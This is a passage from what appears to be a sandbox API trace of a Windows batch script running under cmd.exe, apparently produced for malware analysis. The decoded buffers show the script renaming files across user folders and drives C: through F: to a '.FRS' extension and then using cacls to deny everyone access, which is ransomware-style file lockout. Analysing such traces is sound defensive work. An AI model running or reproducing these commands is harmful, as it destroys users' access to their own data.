lpDistanceToMoveHigh=0x0) returned 0x82 [0088.928] MultiByteToWideChar (in: CodePage=0x1b5, dwFlags=0x1, lpMultiByteStr=0x12b6840, cbMultiByte=32, lpWideCharStr=0x12c4840, cchWideChar=512 | out: lpWideCharStr="If \\\"%e%\\\"==\\\"encrypt\\\" goto 3\r\ne\" \"C:\\FRS_TEMP\\temp.txt\"')do set n=%%i\r\n") returned 32 [0088.928] SetFilePointer (in: hFile=0x34c, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x82 [0088.928] _get_osfhandle (_FileHandle=3) returned 0x34c [0088.928] GetFileType (hFile=0x34c) returned 0x1 [0088.928] SetFilePointer (in: hFile=0x34c, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x82 [0088.928] ReadFile (in: hFile=0x34c, lpBuffer=0x12b6840, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0xc8e96c, lpOverlapped=0x0 | out: lpBuffer=0x12b6840*, lpNumberOfBytesRead=0xc8e96c*=0x200, lpOverlapped=0x0) returned 1 [0088.929] SetFilePointer (in: hFile=0x34c, lDistanceToMove=135, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x87 [0088.929] MultiByteToWideChar (in: CodePage=0x1b5, dwFlags=0x1, lpMultiByteStr=0x12b6840, cbMultiByte=5, lpWideCharStr=0x12c4840, cchWideChar=512 | out: lpWideCharStr="cls\r\n%e%\\\"==\\\"encrypt\\\" goto 3\r\n") returned 5 [0088.929] SetFilePointer (in: hFile=0x34c, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x87 [0088.929] _get_osfhandle (_FileHandle=3) returned 0x34c [0088.929] GetFileType (hFile=0x34c) returned 0x1 [0088.929] SetFilePointer (in: hFile=0x34c, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x87 [0088.929] ReadFile (in: hFile=0x34c, lpBuffer=0x12b6840, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0xc8e96c, lpOverlapped=0x0 | out: lpBuffer=0x12b6840*, lpNumberOfBytesRead=0xc8e96c*=0x200, lpOverlapped=0x0) returned 1 [0088.929] SetFilePointer (in: hFile=0x34c, lDistanceToMove=143, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x8f [0088.929] MultiByteToWideChar (in: CodePage=0x1b5, dwFlags=0x1, lpMultiByteStr=0x12b6840, cbMultiByte=8, lpWideCharStr=0x12c4840, cchWideChar=512 | out: lpWideCharStr="goto 2\r\n\\\"==\\\"encrypt\\\" goto 3\r\n") returned 8 [0088.929] SetFilePointer (in: hFile=0x34c, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x8f [0088.929] _get_osfhandle (_FileHandle=3) returned 0x34c [0088.929] GetFileType (hFile=0x34c) returned 0x1 [0088.929] SetFilePointer (in: hFile=0x34c, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x8f [0088.929] ReadFile (in: hFile=0x34c, lpBuffer=0x12b6840, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0xc8e96c, lpOverlapped=0x0 | out: lpBuffer=0x12b6840*, lpNumberOfBytesRead=0xc8e96c*=0x200, lpOverlapped=0x0) returned 1 [0088.929] SetFilePointer (in: hFile=0x34c, lDistanceToMove=145, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x91 [0088.929] MultiByteToWideChar (in: CodePage=0x1b5, dwFlags=0x1, lpMultiByteStr=0x12b6840, cbMultiByte=2, lpWideCharStr=0x12c4840, cchWideChar=512 | out: lpWideCharStr="\r\nto 2\r\n") returned 2 [0088.929] SetFilePointer (in: hFile=0x34c, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x91 [0088.929] _get_osfhandle (_FileHandle=3) returned 0x34c [0088.929] GetFileType (hFile=0x34c) returned 0x1 [0088.929] SetFilePointer (in: hFile=0x34c, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x91 [0088.929] ReadFile (in: hFile=0x34c, lpBuffer=0x12b6840, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0xc8e96c, lpOverlapped=0x0 | out: lpBuffer=0x12b6840*, lpNumberOfBytesRead=0xc8e96c*=0x200, lpOverlapped=0x0) returned 1 [0088.929] SetFilePointer (in: hFile=0x34c, lDistanceToMove=149, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x95 [0088.929] MultiByteToWideChar (in: CodePage=0x1b5, dwFlags=0x1, lpMultiByteStr=0x12b6840, cbMultiByte=4, lpWideCharStr=0x12c4840, cchWideChar=512 | out: lpWideCharStr=":2\r\n 2\r\n") returned 4 [0088.929] SetFilePointer (in: hFile=0x34c, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x95 [0088.929] _get_osfhandle (_FileHandle=3) returned 0x34c [0088.929] GetFileType (hFile=0x34c) returned 0x1 [0088.929] SetFilePointer (in: hFile=0x34c, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x95 [0088.929] ReadFile (in: hFile=0x34c, lpBuffer=0x12b6840, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0xc8e96c, lpOverlapped=0x0 | out: lpBuffer=0x12b6840*, lpNumberOfBytesRead=0xc8e96c*=0x200, lpOverlapped=0x0) returned 1 [0088.929] SetFilePointer (in: hFile=0x34c, lDistanceToMove=196, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0xc4 [0088.929] MultiByteToWideChar (in: CodePage=0x1b5, dwFlags=0x1, lpMultiByteStr=0x12b6840, cbMultiByte=47, lpWideCharStr=0x12c4840, cchWideChar=512 | out: lpWideCharStr="ren \"C:\\Users\\%USERNAME%\\Desktop\\*.*\" *.*.FRS\r\n\\temp.txt\"')do set n=%%i\r\n") returned 47 [0088.929] SetFilePointer (in: hFile=0x34c, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0xc4 [0088.930] _get_osfhandle (_FileHandle=3) returned 0x34c [0088.930] GetFileType (hFile=0x34c) returned 0x1 [0088.930] SetFilePointer (in: hFile=0x34c, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0xc4 [0088.930] ReadFile (in: hFile=0x34c, lpBuffer=0x12b6840, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0xc8e96c, lpOverlapped=0x0 | out: lpBuffer=0x12b6840*, lpNumberOfBytesRead=0xc8e96c*=0x200, lpOverlapped=0x0) returned 1 [0088.930] SetFilePointer (in: hFile=0x34c, lDistanceToMove=247, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0xf7 [0088.930] MultiByteToWideChar (in: CodePage=0x1b5, dwFlags=0x1, lpMultiByteStr=0x12b6840, cbMultiByte=51, lpWideCharStr=0x12c4840, cchWideChar=512 | out: lpWideCharStr="ren \"C:\\Users\\%USERNAME%\\Saved Games\\*.*\" *.*.FRS\r\np.txt\"')do set n=%%i\r\n") returned 51 [0088.930] SetFilePointer (in: hFile=0x34c, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0xf7 [0088.930] _get_osfhandle (_FileHandle=3) returned 0x34c [0088.930] GetFileType (hFile=0x34c) returned 0x1 [0088.930] SetFilePointer (in: hFile=0x34c, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0xf7 [0088.930] ReadFile (in: hFile=0x34c, lpBuffer=0x12b6840, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0xc8e96c, lpOverlapped=0x0 | out: lpBuffer=0x12b6840*, lpNumberOfBytesRead=0xc8e96c*=0x200, lpOverlapped=0x0) returned 1 [0088.930] SetFilePointer (in: hFile=0x34c, lDistanceToMove=292, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x124 [0088.930] MultiByteToWideChar (in: CodePage=0x1b5, dwFlags=0x1, lpMultiByteStr=0x12b6840, cbMultiByte=45, lpWideCharStr=0x12c4840, cchWideChar=512 | out: lpWideCharStr="ren \"C:\\Users\\%USERNAME%\\Links\\*.*\" *.*.FRS\r\n.FRS\r\n") returned 45 [0088.930] SetFilePointer (in: hFile=0x34c, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x124 [0088.930] _get_osfhandle (_FileHandle=3) returned 0x34c [0088.930] GetFileType (hFile=0x34c) returned 0x1 [0088.930] SetFilePointer (in: hFile=0x34c, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x124 [0088.930] ReadFile (in: hFile=0x34c, lpBuffer=0x12b6840, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0xc8e96c, lpOverlapped=0x0 | out: lpBuffer=0x12b6840*, lpNumberOfBytesRead=0xc8e96c*=0x200, lpOverlapped=0x0) returned 1 [0088.930] SetFilePointer (in: hFile=0x34c, lDistanceToMove=341, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x155 [0088.930] MultiByteToWideChar (in: CodePage=0x1b5, dwFlags=0x1, lpMultiByteStr=0x12b6840, cbMultiByte=49, lpWideCharStr=0x12c4840, cchWideChar=512 | out: lpWideCharStr="ren \"C:\\Users\\%USERNAME%\\Favorites\\*.*\" *.*.FRS\r\n\r\n") returned 49 [0088.930] SetFilePointer (in: hFile=0x34c, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x155 [0088.930] _get_osfhandle (_FileHandle=3) returned 0x34c [0088.930] GetFileType (hFile=0x34c) returned 0x1 [0088.930] SetFilePointer (in: hFile=0x34c, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x155 [0088.930] ReadFile (in: hFile=0x34c, lpBuffer=0x12b6840, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0xc8e96c, lpOverlapped=0x0 | out: lpBuffer=0x12b6840*, lpNumberOfBytesRead=0xc8e96c*=0x200, lpOverlapped=0x0) returned 1 [0088.930] SetFilePointer (in: hFile=0x34c, lDistanceToMove=389, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x185 [0088.930] MultiByteToWideChar (in: CodePage=0x1b5, dwFlags=0x1, lpMultiByteStr=0x12b6840, cbMultiByte=48, lpWideCharStr=0x12c4840, cchWideChar=512 | out: lpWideCharStr="ren \"C:\\Users\\%USERNAME%\\Searches\\*.*\" *.*.FRS\r\n\n") returned 48 [0088.930] SetFilePointer (in: hFile=0x34c, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x185 [0088.930] _get_osfhandle (_FileHandle=3) returned 0x34c [0088.930] GetFileType (hFile=0x34c) returned 0x1 [0088.930] SetFilePointer (in: hFile=0x34c, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x185 [0088.931] ReadFile (in: hFile=0x34c, lpBuffer=0x12b6840, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0xc8e96c, lpOverlapped=0x0 | out: lpBuffer=0x12b6840*, lpNumberOfBytesRead=0xc8e96c*=0x200, lpOverlapped=0x0) returned 1 [0088.931] SetFilePointer (in: hFile=0x34c, lDistanceToMove=435, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x1b3 [0088.931] MultiByteToWideChar (in: CodePage=0x1b5, dwFlags=0x1, lpMultiByteStr=0x12b6840, cbMultiByte=46, lpWideCharStr=0x12c4840, cchWideChar=512 | out: lpWideCharStr="ren \"C:\\Users\\%USERNAME%\\Videos\\*.*\" *.*.FRS\r\n\r\n") returned 46 [0088.931] SetFilePointer (in: hFile=0x34c, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x1b3 [0088.931] _get_osfhandle (_FileHandle=3) returned 0x34c [0088.931] GetFileType (hFile=0x34c) returned 0x1 [0088.931] SetFilePointer (in: hFile=0x34c, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x1b3 [0088.931] ReadFile (in: hFile=0x34c, lpBuffer=0x12b6840, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0xc8e96c, lpOverlapped=0x0 | out: lpBuffer=0x12b6840*, lpNumberOfBytesRead=0xc8e96c*=0x200, lpOverlapped=0x0) returned 1 [0088.931] SetFilePointer (in: hFile=0x34c, lDistanceToMove=483, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x1e3 [0088.931] MultiByteToWideChar (in: CodePage=0x1b5, dwFlags=0x1, lpMultiByteStr=0x12b6840, cbMultiByte=48, lpWideCharStr=0x12c4840, cchWideChar=512 | out: lpWideCharStr="ren \"C:\\Users\\%USERNAME%\\Pictures\\*.*\" *.*.FRS\r\n") returned 48 [0088.931] SetFilePointer (in: hFile=0x34c, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x1e3 [0088.931] _get_osfhandle (_FileHandle=3) returned 0x34c [0088.931] GetFileType (hFile=0x34c) returned 0x1 [0088.931] SetFilePointer (in: hFile=0x34c, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x1e3 [0088.931] ReadFile (in: hFile=0x34c, lpBuffer=0x12b6840, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0xc8e96c, lpOverlapped=0x0 | out: lpBuffer=0x12b6840*, lpNumberOfBytesRead=0xc8e96c*=0x200, lpOverlapped=0x0) returned 1 [0088.931] SetFilePointer (in: hFile=0x34c, lDistanceToMove=518, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x206 [0088.931] MultiByteToWideChar (in: CodePage=0x1b5, dwFlags=0x1, lpMultiByteStr=0x12b6840, cbMultiByte=35, lpWideCharStr=0x12c4840, cchWideChar=512 | out: lpWideCharStr="ren \"C:\\Users\\Public\\*.*\" *.*.FRS\r\n.*\" *.*.FRS\r\n") returned 35 [0088.931] SetFilePointer (in: hFile=0x34c, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x206 [0088.931] _get_osfhandle (_FileHandle=3) returned 0x34c [0088.931] GetFileType (hFile=0x34c) returned 0x1 [0088.931] SetFilePointer (in: hFile=0x34c, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x206 [0088.931] ReadFile (in: hFile=0x34c, lpBuffer=0x12b6840, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0xc8e96c, lpOverlapped=0x0 | out: lpBuffer=0x12b6840*, lpNumberOfBytesRead=0xc8e96c*=0x200, lpOverlapped=0x0) returned 1 [0088.931] SetFilePointer (in: hFile=0x34c, lDistanceToMove=540, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x21c [0088.931] MultiByteToWideChar (in: CodePage=0x1b5, dwFlags=0x1, lpMultiByteStr=0x12b6840, cbMultiByte=22, lpWideCharStr=0x12c4840, cchWideChar=512 | out: lpWideCharStr="ren \"C:\\*.*\" *.*.FRS\r\n.*\" *.*.FRS\r\n") returned 22 [0088.931] SetFilePointer (in: hFile=0x34c, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x21c [0088.931] _get_osfhandle (_FileHandle=3) returned 0x34c [0088.931] GetFileType (hFile=0x34c) returned 0x1 [0088.931] SetFilePointer (in: hFile=0x34c, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x21c [0088.931] ReadFile (in: hFile=0x34c, lpBuffer=0x12b6840, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0xc8e96c, lpOverlapped=0x0 | out: lpBuffer=0x12b6840*, lpNumberOfBytesRead=0xc8e96c*=0x200, lpOverlapped=0x0) returned 1 [0088.931] SetFilePointer (in: hFile=0x34c, lDistanceToMove=562, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x232 [0088.932] MultiByteToWideChar (in: CodePage=0x1b5, dwFlags=0x1, lpMultiByteStr=0x12b6840, cbMultiByte=22, lpWideCharStr=0x12c4840, cchWideChar=512 | out: lpWideCharStr="ren \"D:\\*.*\" *.*.FRS\r\n") returned 22 [0088.932] SetFilePointer (in: hFile=0x34c, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x232 [0088.932] _get_osfhandle (_FileHandle=3) returned 0x34c [0088.932] GetFileType (hFile=0x34c) returned 0x1 [0088.932] SetFilePointer (in: hFile=0x34c, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x232 [0088.932] ReadFile (in: hFile=0x34c, lpBuffer=0x12b6840, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0xc8e96c, lpOverlapped=0x0 | out: lpBuffer=0x12b6840*, lpNumberOfBytesRead=0xc8e96c*=0x200, lpOverlapped=0x0) returned 1 [0088.932] SetFilePointer (in: hFile=0x34c, lDistanceToMove=584, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x248 [0088.932] MultiByteToWideChar (in: CodePage=0x1b5, dwFlags=0x1, lpMultiByteStr=0x12b6840, cbMultiByte=22, lpWideCharStr=0x12c4840, cchWideChar=512 | out: lpWideCharStr="ren \"E:\\*.*\" *.*.FRS\r\n") returned 22 [0088.932] SetFilePointer (in: hFile=0x34c, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x248 [0088.932] _get_osfhandle (_FileHandle=3) returned 0x34c [0088.932] GetFileType (hFile=0x34c) returned 0x1 [0088.932] SetFilePointer (in: hFile=0x34c, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x248 [0088.932] ReadFile (in: hFile=0x34c, lpBuffer=0x12b6840, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0xc8e96c, lpOverlapped=0x0 | out: lpBuffer=0x12b6840*, lpNumberOfBytesRead=0xc8e96c*=0x200, lpOverlapped=0x0) returned 1 [0088.932] SetFilePointer (in: hFile=0x34c, lDistanceToMove=606, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x25e [0088.932] MultiByteToWideChar (in: CodePage=0x1b5, dwFlags=0x1, lpMultiByteStr=0x12b6840, cbMultiByte=22, lpWideCharStr=0x12c4840, cchWideChar=512 | out: lpWideCharStr="ren \"F:\\*.*\" *.*.FRS\r\n") returned 22 [0088.932] SetFilePointer (in: hFile=0x34c, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x25e [0088.932] _get_osfhandle (_FileHandle=3) returned 0x34c [0088.932] GetFileType (hFile=0x34c) returned 0x1 [0088.932] SetFilePointer (in: hFile=0x34c, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x25e [0088.932] ReadFile (in: hFile=0x34c, lpBuffer=0x12b6840, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0xc8e96c, lpOverlapped=0x0 | out: lpBuffer=0x12b6840*, lpNumberOfBytesRead=0xc8e96c*=0x200, lpOverlapped=0x0) returned 1 [0088.932] SetFilePointer (in: hFile=0x34c, lDistanceToMove=669, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x29d [0088.932] MultiByteToWideChar (in: CodePage=0x1b5, dwFlags=0x1, lpMultiByteStr=0x12b6840, cbMultiByte=63, lpWideCharStr=0x12c4840, cchWideChar=512 | out: lpWideCharStr="echo y|cacls \"C:\\Users\\%USERNAME%\\Desktop\\*.*\" /e /d everyone\r\net n=%%i\r\n") returned 63 [0088.932] SetFilePointer (in: hFile=0x34c, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x29d [0088.932] _get_osfhandle (_FileHandle=3) returned 0x34c [0088.932] GetFileType (hFile=0x34c) returned 0x1 [0088.932] SetFilePointer (in: hFile=0x34c, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x29d [0088.932] ReadFile (in: hFile=0x34c, lpBuffer=0x12b6840, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0xc8e96c, lpOverlapped=0x0 | out: lpBuffer=0x12b6840*, lpNumberOfBytesRead=0xc8e96c*=0x200, lpOverlapped=0x0) returned 1 [0088.932] SetFilePointer (in: hFile=0x34c, lDistanceToMove=736, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x2e0 [0088.932] MultiByteToWideChar (in: CodePage=0x1b5, dwFlags=0x1, lpMultiByteStr=0x12b6840, cbMultiByte=67, lpWideCharStr=0x12c4840, cchWideChar=512 | out: lpWideCharStr="echo y|cacls \"C:\\Users\\%USERNAME%\\Saved Games\\*.*\" /e /d everyone\r\n=%%i\r\n") returned 67 [0088.932] SetFilePointer (in: hFile=0x34c, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x2e0 [0088.932] _get_osfhandle (_FileHandle=3) returned 0x34c [0088.933] GetFileType (hFile=0x34c) returned 0x1 [0088.933] SetFilePointer (in: hFile=0x34c, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x2e0 [0088.933] ReadFile (in: hFile=0x34c, lpBuffer=0x12b6840, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0xc8e96c, lpOverlapped=0x0 | out: lpBuffer=0x12b6840*, lpNumberOfBytesRead=0xc8e96c*=0x200, lpOverlapped=0x0) returned 1 [0088.933] SetFilePointer (in: hFile=0x34c, lDistanceToMove=797, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x31d [0088.933] MultiByteToWideChar (in: CodePage=0x1b5, dwFlags=0x1, lpMultiByteStr=0x12b6840, cbMultiByte=61, lpWideCharStr=0x12c4840, cchWideChar=512 | out: lpWideCharStr="echo y|cacls \"C:\\Users\\%USERNAME%\\Links\\*.*\" /e /d everyone\r\nyone\r\n") returned 61 [0088.933] SetFilePointer (in: hFile=0x34c, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x31d [0088.933] _get_osfhandle (_FileHandle=3) returned 0x34c [0088.933] GetFileType (hFile=0x34c) returned 0x1 [0088.933] SetFilePointer (in: hFile=0x34c, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x31d [0088.933] ReadFile (in: hFile=0x34c, lpBuffer=0x12b6840, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0xc8e96c, lpOverlapped=0x0 | out: lpBuffer=0x12b6840*, lpNumberOfBytesRead=0xc8e96c*=0x200, lpOverlapped=0x0) returned 1 [0088.933] SetFilePointer (in: hFile=0x34c, lDistanceToMove=862, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x35e [0088.933] MultiByteToWideChar (in: CodePage=0x1b5, dwFlags=0x1, lpMultiByteStr=0x12b6840, cbMultiByte=65, lpWideCharStr=0x12c4840, cchWideChar=512 | out: lpWideCharStr="echo y|cacls \"C:\\Users\\%USERNAME%\\Favorites\\*.*\" /e /d everyone\r\n\r\n") returned 65 [0088.933] SetFilePointer (in: hFile=0x34c, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x35e [0088.933] _get_osfhandle (_FileHandle=3) returned 0x34c [0088.933] GetFileType (hFile=0x34c) returned 0x1 [0088.933] SetFilePointer (in: hFile=0x34c, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x35e [0088.933] ReadFile (in: hFile=0x34c, lpBuffer=0x12b6840, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0xc8e96c, lpOverlapped=0x0 | out: lpBuffer=0x12b6840*, lpNumberOfBytesRead=0xc8e96c*=0x200, lpOverlapped=0x0) returned 1 [0088.933] SetFilePointer (in: hFile=0x34c, lDistanceToMove=926, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x39e [0088.933] MultiByteToWideChar (in: CodePage=0x1b5, dwFlags=0x1, lpMultiByteStr=0x12b6840, cbMultiByte=64, lpWideCharStr=0x12c4840, cchWideChar=512 | out: lpWideCharStr="echo y|cacls \"C:\\Users\\%USERNAME%\\Searches\\*.*\" /e /d everyone\r\n\n") returned 64 [0088.933] SetFilePointer (in: hFile=0x34c, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x39e [0088.933] _get_osfhandle (_FileHandle=3) returned 0x34c [0088.933] GetFileType (hFile=0x34c) returned 0x1 [0088.933] SetFilePointer (in: hFile=0x34c, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x39e [0088.933] ReadFile (in: hFile=0x34c, lpBuffer=0x12b6840, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0xc8e96c, lpOverlapped=0x0 | out: lpBuffer=0x12b6840*, lpNumberOfBytesRead=0xc8e96c*=0x200, lpOverlapped=0x0) returned 1 [0088.933] SetFilePointer (in: hFile=0x34c, lDistanceToMove=988, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x3dc [0088.933] MultiByteToWideChar (in: CodePage=0x1b5, dwFlags=0x1, lpMultiByteStr=0x12b6840, cbMultiByte=62, lpWideCharStr=0x12c4840, cchWideChar=512 | out: lpWideCharStr="echo y|cacls \"C:\\Users\\%USERNAME%\\Videos\\*.*\" /e /d everyone\r\n\r\n") returned 62 [0088.933] SetFilePointer (in: hFile=0x34c, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x3dc [0088.933] _get_osfhandle (_FileHandle=3) returned 0x34c [0088.933] GetFileType (hFile=0x34c) returned 0x1 [0088.933] SetFilePointer (in: hFile=0x34c, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x3dc [0088.933] ReadFile (in: hFile=0x34c, lpBuffer=0x12b6840, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0xc8e96c, lpOverlapped=0x0 | out: lpBuffer=0x12b6840*, lpNumberOfBytesRead=0xc8e96c*=0x200, lpOverlapped=0x0) returned 1 [0088.934] SetFilePointer (in: hFile=0x34c, lDistanceToMove=1052, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x41c [0088.934] MultiByteToWideChar (in: CodePage=0x1b5, dwFlags=0x1, lpMultiByteStr=0x12b6840, cbMultiByte=64, lpWideCharStr=0x12c4840, cchWideChar=512 | out: lpWideCharStr="echo 